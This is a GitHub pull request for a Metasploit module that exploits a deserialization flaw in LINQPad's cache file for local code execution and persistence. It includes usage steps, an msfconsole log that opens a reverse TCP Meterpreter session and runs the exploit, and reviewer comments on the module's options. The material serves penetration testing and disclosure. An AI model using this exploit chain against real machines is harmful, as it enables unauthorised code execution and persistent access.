Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Linqpad deserialization #19777

Open
wants to merge 6 commits into
base: master
Choose a base branch
from
Open

Linqpad deserialization #19777

wants to merge 6 commits into from
+139 −0

Conversation

msutovsky-r7
Copy link
Contributor

LINQPad 5.48 Deserialization

LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from here.

Verification Steps

Steps:

  1. Install the application
  2. Start msfconsole
  3. Get Meterpreter/cmd shell
  4. Run: use windows/local/linqpad_deserialization
  5. Set payload - for example set payload cmd/windows/generic - and corresponding parameters
  6. Set parameters session, cache_path, linqpad_path
  7. Run exploit

Options

cache_path

The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.

linqpad_path

Final part of exploit runs the LINQPad to trigger deserialization procedure. The linpad_path parameter sets the path to LINQPad binary, which is ran at the end of exploit.

Example:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 192.168.95.128
msf6 exploit(multi/handler) > set LPORT 4242
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.95.128:4242 
[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization
msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_PATH C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd
msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad
msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe
msf6 exploit(windows/local/linqpad_deserialization) > set session 1
msf6 exploit(windows/local/linqpad_deserialization) > exploit
[*] Exploit completed, but no session was created.

Previous example will run calc.exe when LINQPad will start.

@h00die
Copy link
Contributor

h00die commented Dec 30, 2024

#19592

bwatters-r7
bwatters-r7 reviewed Jan 10, 2025
View reviewed changes
modules/exploits/windows/local/linqpad_deserialization.rb Outdated
)
)
register_options([
OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]),
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]),
OptPath.new('LINQPad_PATH', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]),

modules/exploits/windows/local/linqpad_deserialization.rb Outdated
def check
if datastore['LINQPad_path'].blank? || !file?(datastore['LINQPad_path'])
return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist')
elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat')
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat')
elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['CACHE_PATH']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')

modules/exploits/windows/local/linqpad_deserialization.rb Outdated
)
register_options([
OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]),
OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data'])
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data'])
OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data']),
OptBool.new('UNINSTALL', [true, 'Uninstall persistence', false])

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Or other way that is consistent/add action.....?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@msutovsky-r7 @h00die @bwatters-r7